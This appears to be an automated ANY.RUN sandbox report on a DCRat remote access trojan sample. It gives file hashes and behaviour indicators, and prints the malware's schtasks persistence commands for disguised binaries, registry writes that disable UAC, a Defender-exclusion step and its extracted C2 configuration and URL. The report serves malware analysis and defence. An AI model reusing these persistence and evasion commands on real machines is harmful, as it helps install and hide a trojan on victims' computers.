File name:

bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6

Full analysis: https://app.any.run/tasks/da8650e8-32f8-4e1e-9283-b9bfb626ba47
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: May 24, 2024, 22:06:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
dcrat
remote
darkcrystal
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

D1BFFB7DFD0CCFE6AA48313B65C2EB11

SHA1:

5D2EA43954CA796AB1B9C8852E89AA34188C045B

SHA256:

BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6

SSDEEP:

98304:PdBQLtVbRMwj60PNahlEzEJ8pyd8phwDx5Z6xaLlJEQf:n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)

    • UAC/LUA settings modification

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Adds path to the Windows Defender exclusion list

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 8012)
      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 7456)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 8172)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 7292)
      • wscript.exe (PID: 6448)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
      • wscript.exe (PID: 8068)
      • wscript.exe (PID: 7748)
      • wscript.exe (PID: 6660)

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)

    • DARKCRYSTAL has been detected (SURICATA)

      • dasHost.exe (PID: 7260)

    • DCRAT has been detected (YARA)

      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • ShellExperienceHost.exe (PID: 6684)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Reads the date of Windows installation

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Starts CMD.EXE for commands execution

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)

    • The process creates files with name similar to system file names

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)

    • Executed via WMI

      • schtasks.exe (PID: 6876)
      • schtasks.exe (PID: 6916)
      • schtasks.exe (PID: 6112)
      • schtasks.exe (PID: 7004)
      • schtasks.exe (PID: 6980)
      • schtasks.exe (PID: 4936)
      • schtasks.exe (PID: 4952)
      • schtasks.exe (PID: 3608)
      • schtasks.exe (PID: 2736)
      • schtasks.exe (PID: 4996)
      • schtasks.exe (PID: 4416)
      • schtasks.exe (PID: 72)
      • schtasks.exe (PID: 4140)
      • schtasks.exe (PID: 2592)
      • schtasks.exe (PID: 6944)
      • schtasks.exe (PID: 3624)
      • schtasks.exe (PID: 5536)
      • schtasks.exe (PID: 636)
      • schtasks.exe (PID: 5932)
      • schtasks.exe (PID: 6156)
      • schtasks.exe (PID: 2332)

    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 4936)

    • Executable content was dropped or overwritten

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)

    • Starts POWERSHELL.EXE for commands execution

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)

    • Script adds exclusion path to Windows Defender

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)

    • Creates file in the systems drive root

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)

    • The process executes VB scripts

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 8012)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 7456)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 8172)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 7292)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 6448)
      • wscript.exe (PID: 7460)
      • wscript.exe (PID: 8068)
      • wscript.exe (PID: 6660)
      • wscript.exe (PID: 7748)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)
      • wscript.exe (PID: 6660)

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7988)
      • wscript.exe (PID: 7348)
      • wscript.exe (PID: 6932)
      • wscript.exe (PID: 7512)
      • wscript.exe (PID: 6420)
      • wscript.exe (PID: 3732)
      • wscript.exe (PID: 7460)

  • INFO

    • Reads the computer name

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • ShellExperienceHost.exe (PID: 6684)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Checks supported languages

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • ShellExperienceHost.exe (PID: 6684)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Process checks computer location settings

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Reads Environment values

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Reads the machine GUID from the registry

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6308)
      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Process checks whether UAC notifications are on

      • bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe (PID: 6520)
      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Create files in a temporary directory

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Reads Microsoft Office registry keys

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7072)
      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 6880)
      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 6944)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6592)
      • powershell.exe (PID: 6620)
      • powershell.exe (PID: 6584)
      • powershell.exe (PID: 6920)
      • powershell.exe (PID: 7028)
      • powershell.exe (PID: 6876)
      • powershell.exe (PID: 7004)

    • Checks proxy server information

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)

    • Disables trace logs

      • dasHost.exe (PID: 7260)
      • dasHost.exe (PID: 7724)
      • dasHost.exe (PID: 5656)
      • dasHost.exe (PID: 7196)
      • dasHost.exe (PID: 2304)
      • dasHost.exe (PID: 308)
      • dasHost.exe (PID: 324)
      • dasHost.exe (PID: 7908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process(308) dasHost.exe
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
TagF
Mutexadw-Kfpdv2jonhNaGxe7D96L
searchpath%UsersFolder% - Fast
Targetals
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
Mutexadw-Kfpdv2jonhNaGxe7D96L
TagF
Debugfalse
ServerConfigReplacementTable
0-
2
6^
E!
k;
a#
j%
c$
O>
w.
F(
i&
y`
R,
H~
I<
M*
L@
p|
A)
V_
PluginConfigReplacementTable
1_
2|
U)
V@
b!
G%
r-
Q(
T~
S;
J*
q
B,
W#
c<
Z^
i`
d>
h&
N$
F.
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
searchpath%UsersFolder% - Fast
StealerEnabledfalse
StealerOptionsfalse
SelfDeletefalse
(PID) Process(324) dasHost.exe
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
TagF
Mutexadw-Kfpdv2jonhNaGxe7D96L
searchpath%UsersFolder% - Fast
Targetals
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
Mutexadw-Kfpdv2jonhNaGxe7D96L
TagF
Debugfalse
ServerConfigReplacementTable
0-
2
6^
E!
k;
a#
j%
c$
O>
w.
F(
i&
y`
R,
H~
I<
M*
L@
p|
A)
V_
PluginConfigReplacementTable
1_
2|
U)
V@
b!
G%
r-
Q(
T~
S;
J*
q
B,
W#
c<
Z^
i`
d>
h&
N$
F.
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
searchpath%UsersFolder% - Fast
StealerEnabledfalse
StealerOptionsfalse
SelfDeletefalse
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (45.1)
.exe | Win32 Executable MS Visual C++ (generic) (19.2)
.exe | Win64 Executable (generic) (17)
.scr | Windows screen saver (8)
.dll | Win32 Dynamic Link Library (generic) (4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:05:04 16:03:35+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 1951744
InitializedDataSize: 13824
UninitializedDataSize: -
EntryPoint: 0x1de6de
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 774.479.801.351
ProductVersionNumber: 166.535.459.901
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
ProductName: L3Wl9txpfPeE7pTZeDBnEJd0ARder
CompanyName: 9fEIdVaVzhSWJ4KUn4r6
InternalName: rwF4CQulk1SF7PmAm68mH.exe
LegalCopyright: VulAlhhrl8i
Comments: uM8OaEDfBn9QLgVU97yGaIFpMBo1
OriginalFileName: OIT.exe
ProductVersion: 166.535.459.901
FileVersion: 774.479.801.351
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
195
Monitored processes
76
Malicious processes
19
Suspicious processes
8

Behavior graph

Click at the process to see the details
start bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe no specs cmd.exe conhost.exe no specs bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe shellexperiencehost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs #DARKCRYSTAL dashost.exe wscript.exe no specs wscript.exe no specs dashost.exe wscript.exe no specs wscript.exe no specs dashost.exe wscript.exe no specs wscript.exe no specs dashost.exe wscript.exe no specs wscript.exe no specs dashost.exe wscript.exe no specs wscript.exe no specs #DCRAT dashost.exe wscript.exe no specs wscript.exe no specs #DCRAT dashost.exe wscript.exe no specs wscript.exe no specs dashost.exe wscript.exe no specs wscript.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
72schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\admin\wininit.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
308C:\found.000\dir_00000002.chk\dasHost.exeC:\found.000\dir_00000002.chk\dasHost.exe
wscript.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\found.000\dir_00000002.chk\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
DcRat
(PID) Process(308) dasHost.exe
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
TagF
Mutexadw-Kfpdv2jonhNaGxe7D96L
searchpath%UsersFolder% - Fast
Targetals
(PID) Process(308) dasHost.exe
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
Mutexadw-Kfpdv2jonhNaGxe7D96L
TagF
Debugfalse
ServerConfigReplacementTable
0-
2
6^
E!
k;
a#
j%
c$
O>
w.
F(
i&
y`
R,
H~
I<
M*
L@
p|
A)
V_
PluginConfigReplacementTable
1_
2|
U)
V@
b!
G%
r-
Q(
T~
S;
J*
q
B,
W#
c<
Z^
i`
d>
h&
N$
F.
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
searchpath%UsersFolder% - Fast
StealerEnabledfalse
StealerOptionsfalse
SelfDeletefalse
324C:\found.000\dir_00000002.chk\dasHost.exeC:\found.000\dir_00000002.chk\dasHost.exe
wscript.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\found.000\dir_00000002.chk\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
DcRat
(PID) Process(324) dasHost.exe
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
TagF
Mutexadw-Kfpdv2jonhNaGxe7D96L
searchpath%UsersFolder% - Fast
Targetals
(PID) Process(324) dasHost.exe
C2 (1)http://a0949311.xsph.ru/_Defaultwindows
Options
Mutexadw-Kfpdv2jonhNaGxe7D96L
TagF
Debugfalse
ServerConfigReplacementTable
0-
2
6^
E!
k;
a#
j%
c$
O>
w.
F(
i&
y`
R,
H~
I<
M*
L@
p|
A)
V_
PluginConfigReplacementTable
1_
2|
U)
V@
b!
G%
r-
Q(
T~
S;
J*
q
B,
W#
c<
Z^
i`
d>
h&
N$
F.
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
searchpath%UsersFolder% - Fast
StealerEnabledfalse
StealerOptionsfalse
SelfDeletefalse
608\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
636schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\found.000\dir0001.chk\csrss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1116\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2304C:\found.000\dir_00000002.chk\dasHost.exeC:\found.000\dir_00000002.chk\dasHost.exe
wscript.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\found.000\dir_00000002.chk\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2332schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\found.000\dir0001.chk\csrss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2592schtasks.exe /create /tn "RUXIMICSR" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\RUXIMICS.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2736schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\admin\RuntimeBroker.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
135 769
Read events
135 614
Write events
155
Delete events
0

Modification events

(PID) Process:(6308) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6308) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6308) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6308) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6520) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(6520) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(6520) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(6520) bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID) Process:(6684) ShellExperienceHost.exeKey:\REGISTRY\A\{70cc3777-706b-aa22-e810-b2bbcfafda65}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D00000085E275AA26AEDA01
(PID) Process:(6684) ShellExperienceHost.exeKey:\REGISTRY\A\{70cc3777-706b-aa22-e810-b2bbcfafda65}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D0000004C3378AA26AEDA01
Executable files
32
Suspicious files
1
Text files
52
Unknown types
0

Dropped files

PID
Process
Filename
Type
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\found.000\dir_00000002.chk\21b1a557fd31cctext
MD5:FC10A21E5766D81E09FB96219A2DD9B2
SHA256:08DF1B95DEDFD58E5D0968B54E3C471884EE16DA9FA757B4B02C02926B1B6DC5
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\found.000\dir0000.chk\27d1bcfc3c54e0text
MD5:215E403362744B7A9C11721A1E243837
SHA256:5EC08DD077D3403B5B05AD7AC9DE65CCD6E52EED0A1901EE696974E5AB2CF1F8
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe
MD5:
SHA256:
